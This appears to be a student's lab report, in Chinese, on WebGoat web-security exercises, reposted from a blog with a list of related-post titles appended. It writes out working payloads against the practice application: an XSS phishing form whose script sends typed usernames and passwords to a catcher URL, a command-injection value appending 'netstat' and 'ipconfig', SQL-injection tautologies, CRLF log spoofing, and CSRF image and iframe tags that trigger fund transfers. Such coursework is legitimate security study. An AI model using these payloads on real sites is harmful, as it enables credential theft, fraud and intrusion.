Exp9 Web安全基础实践 20164323段钊阳
网络对抗技术 20164323 Exp9 Web安全基础实践
回答问题
(1)SQL注入攻击原理,如何防御
原理:通过在用户名、密码登输入框中输入特殊字符,在处理字符串与sql语句拼接过程中实现引号闭合、注释部分SQL语句,利用永真式,从而达到登录、显示信息等目的。
防御:对输入进行限制,包括输入长度和特殊字符的类型等
(2)XSS攻击的原理,如何防御
原理:XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码(如,HTML代码和客户端脚本)植入到提供给其它用户使用的页面中,攻击者可以利用XSS漏洞旁路掉访问控制。
防御:收集JSP特征,对内容进行严格验证,规定格式。
(3)CSRF攻击原理,如何防御
原理:CSRF跨站请求伪造,也被称为“oneclickattack”或者sessionriding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用,通过伪装来自受信任用户的请求来利用受信任的网站。是一种依赖web浏览器的、被混淆过的代理人攻击。
防御:在浏览器会话结束后清理cookie,在form中包含秘密信息、用户指定的代号作为cookie之外的验证。
实验内容
执行java -jar webgoat-container-7.0.1-war-exec.jar开启webgoat,
1.Phishing with XSS
在搜索框里输入XSS攻击代码
</form><script>function hack(){XSSImage=newImage;XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";alert("Had this been a real attack... Your credentials were just stolen. User Name =" + document.phish.user.value + "Password =" +document.phish.pass.value);}</script><form name="phish"><br><br><HR><H2>This feature requires account login:</H2><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" οnclick="hack()"></form><br><br><HR>
在表单内填写的用户名密码会被捕获发送给你
2.Reflected XSS
在code输入框内输入<script>alert("20164323dzy");</script>
点击purchase,则会弹出窗口,内容是输入代码中的字符串。
3.Stored XSS Attacks
在发的帖子message部分插入jsp代码,当该帖子被浏览时,该代码也会被浏览器解析成html的内容。
在message中输入<script>alert("20164323 nb");</script> 提交后,浏览该贴,成功弹出窗口,说明攻击成功!
4.Command Injection
右键复选框,选择inspect Element,在某个选项后加上"& netstat -an & ipconfig"
在页面中选择该选型,然后点击view,则会出现该命令执行的结果
5.Numeric SQL Injection
根据其SQL语句SELECT * FROM weather_data WHERE station = [station],在填入的字段中注入特征字符,查看所有的天气数据。
右键复选框,选择inspect Element,然将value ="101"改为value ="101 or 1=1",其值对应的是Columbia,修改完成后选择该选项,然后点击Go!即可查看所有天气数据。
6.Log Spoofing
通过调整输入,从而隐藏登录的信息,不使它被记录到日志文件中。
在用户名输入dzy%0d%0aLogin Succeeded for username: admin
7.String SQL Injection
通过SQL注入构造永真式,使用者可查询到所有的信用卡号。
在输入框直接输入'or 1='1即可
8.Cross Site Request Forgery
写一个URL诱使其他用户点击,从而触发CSRF攻击,我们可以以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件。
查看自己电脑的Screen和menu的值:
message内容为<img src="http://localhost:8080/WebGoat/attack?Screen=276&menu=900&transferFunds=500"/>当点击该图片时,就会发出一个转钱的请求,盗取钱财。提交后,会在消息列表中看到一个新的消息,点击该消息,当前页面就会下载这个消息并显示出来,转走用户的钱,达到CSRF攻击的目的。
提交后点击该链接,可查看操作信息。
9.CSRF Prompt By-Pass
利用CSRF进行冒名操作转账,不过这次包括了转账请求和确认转账成功请求,即需要额外传递两个参数给服务器
在message框输入<iframe src="attack?Screen=src值&menu=menu值&transferFunds=转账数额"> </iframe> <iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM"> </iframe>
点开链接
问题
一开始使用webgoat的时候发现有问题,然后查到是因为java的版本不对,在kali里面把java的版本切换成1.8就可以了
实验感想
本次实验都是利用代码进行攻击需要使用者对语句特别熟悉
转载于:https://www.cnblogs.com/dzy9/p/10922450.html
Exp9 Web安全基础实践 20164323段钊阳相关推荐
- Exp3 免杀原理与实践 20164323段钊阳
网络对抗技术 20164323 Exp3 免杀原理与实践 免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何 ...
- Exp5 MSF基础应用 20164323段钊阳
网络对抗技术 20164323 Exp5 MSF基础应用 靶机 ip:192.168.1.229 kali ip:192.168.1.216 exploit选取 主动攻击:ms17_010_psexe ...
- Exp2 后门原理与实践 20164323段钊阳
220164323 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,. (2)例举你知道的后门如何 ...
- 20155202《网络对抗》Exp9 web安全基础实践
20155202<网络对抗>Exp9 web安全基础实践 实验前回答问题 (1)SQL注入攻击原理,如何防御 SQL注入产生的原因,和栈溢出.XSS等很多其他的攻击方法类似,就是未经检查或 ...
- EXP9 web安全基础实践
<网络对抗>Exp9 Web安全基础实践 WXP2 后门原理 一.基础问题回答 1.SQL注入原理,如何防御 SQL注入原理: 就是通过把SQL命令插入到"Web表单递交&quo ...
- 20145209刘一阳《网络对抗》Exp9 Web安全基础实践
20145209刘一阳<网络对抗>Exp9 Web安全基础实践 基础问题回答 1.SQL注入攻击原理,如何防御? SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求 ...
- Exp8 web基础 20164323段钊阳
网络对抗技术 20164323 Exp8 Web基础 回答问题 (1)什么是表单 在网页中主要负责数据采集功能.一个表单有三个基本组成部分: 表单标签:这里面包含了处理表单数据所用CGI程序的URL以 ...
- 20164305 徐广皓《网络对抗》Exp9 Web安全基础实践
1.WebGoat实践 (1)wegoat安装 下载 webgoat-container-7.0.1-war-exec.jar ,开启WebGoat,在终端中输入命令 java -jar webg ...
- Exp4 恶意代码分析 20164323段钊阳
网络对抗技术 20164323 Exp4 恶意代码分析 1.如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操作有哪些,用什么方法来监控. ...
最新文章
- 自动填充脚本使用及注意事项
- 我是如何使用python控制迅雷自动下载电影的?
- oracle 产看执行计划_ODBA 技能SPM计划
- MQ 之 RocketMQ
- 自己动手写java虚拟机_自己动手写操作系统(要了解的知识点)
- oracle 12c 低版本,oracle高版本迁移数据到低版本(12c至11g)方法
- 剑指Offer名企面试官精讲典型编程题pdf
- java调用python代码
- python批量修改labelme(COCO)标注的json文件的label标签名称
- 推荐!京东开源姿态跟踪新框架LightTrack!
- 非科班出身,如何成为程序员?
- 6.pragma pack
- 华为设备BGP中的路由控制与实验
- 用FL Studio制作反向人声音效(Vocal Chops)
- SQL转换时间的时分
- windows 2003 server安装iis6,附下载文件
- 关于pycharm中代码为灰色以及如何调整代码检查级别的问题
- PHP分片上传文件到又拍云对象存储
- YOLOv5(Windows)使用教程
- 根据两个经纬度点计算距离
热门文章
- 78个学术网站!史上最全常用文献数据库汇总!
- HTTP和MQTT协议实践
- 全概率公式及贝叶斯公式---先验概率、后验概率
- Nginx源码安装及调优配置(二)
- 软件方法(下)分析和设计第8章连载[20210816更新]分析 之 分析类图——知识篇
- seo php,SEO技术:PHP页面的SEO优化
- 数据加密存储---加密文件系统(EFS)介绍
- 使用Tracup中的时间阻塞,提升工作效率(完整指南)
- Unity3d Platformer Pro 2D游戏开发框架使用教程
- PS_一寸(2.5*3.5cm)照片排列在六寸(4*6)相片纸